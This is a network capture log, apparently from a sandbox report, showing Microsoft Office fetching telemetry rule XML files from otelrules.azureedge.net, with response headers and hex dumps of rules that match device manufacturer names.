2024-11-15 13:09:59 UTC	450	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.4	49767	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:59 UTC	192	OUT	GET /rules/rule120608v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:09:59 UTC	517	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:59 GMT Content-Type: text/xml Content-Length: 2160 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA3B95D81" x-ms-request-id: dcc6854f-e01e-0051-7b03-2d84b2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T130959Z-16547b76f7ftnm6xhC1DFW9c8c000000011g00000000114x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:09:59 UTC	2160	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.4	49763	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:59 UTC	193	OUT	GET /rules/rule120402v21s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:09:59 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:59 GMT Content-Type: text/xml Content-Length: 3788 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC2126A6" x-ms-request-id: a9c4262b-101e-000b-3caf-365e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T130959Z-1866b5c5fbbfncq9hC1DFW7rf8000000017000000000ckf6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:09:59 UTC	3788	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.4	49765	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:59 UTC	192	OUT	GET /rules/rule120600v4s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:09:59 UTC	494	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:59 GMT Content-Type: text/xml Content-Length: 2980 Connection: close Vary: Accept-Encoding Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: e7102de9-901e-0029-7d09-37274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T130959Z-1866b5c5fbb7lvschC1DFW4rm000000001bg0000000033z2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:09:59 UTC	2980	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"

Session ID	Source IP	Source Port	Destination IP	Destination Port
13	192.168.2.4	49768	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:00 UTC	192	OUT	GET /rules/rule120610v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:00 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:00 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT ETag: "0x8DC582B9964B277" x-ms-request-id: 3bbfe6b2-c01e-0082-3016-36af72000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131000Z-1866b5c5fbbpxkkxhC1DFWhvmc00000001eg00000000bhyx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:00 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.4	49769	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:00 UTC	192	OUT	GET /rules/rule120611v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:00 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:00 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT ETag: "0x8DC582B9F6F3512" x-ms-request-id: 48bb68ea-401e-0016-35ff-2c53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131000Z-16547b76f7fbkfmzhC1DFWm9tw00000000x000000000cytt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:00 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.4	49770	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:00 UTC	192	OUT	GET /rules/rule120612v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:00 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:00 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT ETag: "0x8DC582BB10C598B" x-ms-request-id: a427850a-601e-0097-52af-36f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131000Z-16547b76f7fljddfhC1DFWeqbs000000023g00000000d11q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:00 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.2.4	49771	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:00 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:00 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:00 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: ad5ef595-c01e-0082-42a3-34af72000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131000Z-164f84587bfwh84ghC1DFWw35400000001n0000000000zze x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:00 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49772	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:00 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:00 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:00 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: a2886317-b01e-00ab-6c01-2ddafd000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131000Z-16547b76f7fbkfmzhC1DFWm9tw00000000vg00000000g459 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:00 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49773	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:01 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:01 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:01 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: b90175c0-c01e-008e-4b8d-367381000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131001Z-164f84587bf5rpzqhC1DFWmra800000001cg0000000028hy x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:01 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49774	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:01 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:01 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:01 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: d03fa3d0-501e-0035-53af-36c923000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131001Z-1866b5c5fbbstkfjhC1DFWhdyg00000001gg0000000009gz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:01 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49775	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:01 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:10:01 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:10:01 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 30929569-101e-008d-79ff-2c92e5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T131001Z-16547b76f7ftnm6xhC1DFW9c8c00000000yg000000008v9a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:10:01 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49776	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:10:01 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
